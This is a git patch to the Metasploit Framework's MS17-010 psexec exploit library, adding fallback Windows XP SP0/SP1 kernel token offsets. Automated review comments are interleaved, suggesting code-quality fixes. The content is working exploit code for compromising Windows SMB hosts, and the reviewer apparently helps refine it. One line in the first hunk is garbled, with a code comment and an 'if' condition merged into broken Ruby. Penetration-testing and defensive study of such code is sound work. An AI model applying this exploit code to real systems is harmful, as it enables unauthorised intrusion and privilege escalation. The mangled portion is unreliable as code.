From 7007bc1444d9c4bc40763ede6c1a64520d96867b Mon Sep 17 00:00:00 2001
From: zerosum0x0
Date: Mon, 29 Jan 2018 19:11:30 -0700
Subject: [PATCH] hopefully fixed XP SP0/SP1 issues
---
 .../exploit/smb/client/psexec_ms17_010.rb | 21 ++++++++++++++++++-
 1 file changed, 20 insertions(+), 1 deletion(-)
diff --git a/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb b/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb
index 0ec45aecdc..57962c1f23 100644
--- a/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb
+++ b/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb
@@ -124,6 +124,23 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
 userAndGroupCount = tokenData[@ctx['TOKEN_USER_GROUP_CNT_OFFSET']..-1].unpack("V")[0] #unpack_from(' 4 or userAndGroupCount == 0 # check NULL too
+ print_error("Bad TOKEN offsets detected (group count = #{userAndGroupCount}), performing workaround...")
+ @ctx['TOKEN_USER_GROUP_CNT_OFFSET'] = @ctx['TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1']
+ @ctx['TOKEN_USER_GROUP_ADDR_OFFSET'] = @ctx['TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1']
+
+ userAndGroupCount = tokenData[@ctx['TOKEN_USER_GROUP_CNT_OFFSET']..-1].unpack("V")[0]
+ userAndGroupsAddr = tokenData[@ctx['TOKEN_USER_GROUP_ADDR_OFFSET']..-1].unpack(fmt)[0]
+
+ # hopefully its not bad anymore
+ if userAndGroupCount > 4 or userAndGroupCount == 0 # check NULL too
+ raise MS17_010_Error, 'Bad TOKEN offsets after workround (group count = #{userAndGroupCount})... Abort > BSOD'
+ end
+ end
+ end
+
 vprint_status("UserAndGroupCount: 0x#{userAndGroupCount.to_s}")
 vprint_status("UserAndGroupsAddr: 0x#{userAndGroupsAddr.to_s(16)}")
@@ -183,7 +200,7 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
 def read_data(read_addr, read_size)
 if read_addr == 0
- raise MS17_010_Error, 'Attempted to read from a NULL pointer!'
+ raise MS17_010_Error, 'Attempted to read from a NULL pointer!'
 end
 fmt = @ctx['PTR_FMT']
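Review bot: The abort message on the new `raise MS17_010_Error` line is single-quoted, so `#{userAndGroupCount}` is never interpolated and the operator will see the literal placeholder instead of the offending count; switching to double quotes also lets you fix the "workround" typo: `raise MS17_010_Error, "Bad TOKEN offsets after workaround (group count = #{userAndGroupCount})... Abort > BSOD"`. The first `if` of the workaround is not legible in this hunk as rendered and the enclosing method begins above it, so I cannot confirm the exact nesting of the three added `end`s; note that the two `@ctx[...] =` assignments overwrite the session-info offsets for the lifetime of the object, which is fine if one target per instance is intended but deserves a one-line comment saying so. Both added `if` conditions use `or`, which has lower precedence than assignment in Ruby and is conventionally reserved for control flow; `||` is the safer spelling. Since the first branch is a recovery path rather than a failure, `print_warning` would describe it more accurately than `print_error`. The second hunk in this file only re-indents the existing NULL-pointer `raise` and needs no change.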
@@ -1190,6 +1207,8 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
 'PCTXTHANDLE_TOKEN_OFFSET'=> 0x24,
 'TOKEN_USER_GROUP_CNT_OFFSET'=> 0x4c,
 'TOKEN_USER_GROUP_ADDR_OFFSET'=> 0x68,
+ 'TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1'=> 0x40,
+ 'TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1'=> 0x5c,
 }
 WIN2K_32_SESSION_INFO = {
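Review bot: The two new `_SP0_SP1` entries carry no comment explaining why a second pair of TOKEN offsets exists, and the hash they extend starts above this hunk (presumably the XP table, judging by the key names and the commit subject, though its name is not visible here), so a reader of the table alone cannot tell that they are the fallback consulted when the default offsets yield an implausible group count. A one-line comment above them would close that gap, e.g. `# Older TOKEN layout (XP SP0/SP1): fallback used at runtime when the offsets above give a bad group count`. The new lines follow the table's existing `'KEY'=> value` spacing, which keeps the literal consistent even though it is not RuboCop's default.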